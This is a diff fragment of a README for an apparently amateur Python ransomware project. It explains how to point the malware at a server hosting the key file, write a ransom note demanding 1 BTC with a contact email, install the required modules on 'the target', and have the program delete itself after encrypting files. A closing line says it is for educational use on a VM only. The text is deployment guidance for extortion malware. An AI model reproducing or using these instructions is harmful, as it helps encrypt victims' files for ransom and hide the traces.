juniordevsec2021/ransomware/README.md

 and in the quotes paste your server link which points to your .key file,for example url = ('https://myserver.com/mykey.key') in line ===>   ransom_message = '''type your message here''' <=== type the message for the ransom,for example: pay 1 BTC to this address >your btc address< and email to this email example@mail.com to get your files back,then save the file and your ransom is ready for testing!
 * ### requirements:
-* python modules: pip install glob cryptography requests(you need to install them on the target).
+* python modules: pip install glob cryptography requests(you need to install them on the target and on your computer,you need to have cryptography module installed to be able to generate keys!).
-* After the ransomware done with the encryption it deletes itself.
+* After the ransomware is done with the encryption it deletes itself.
 # Only for educational purposes!Use it on your VM for tests only!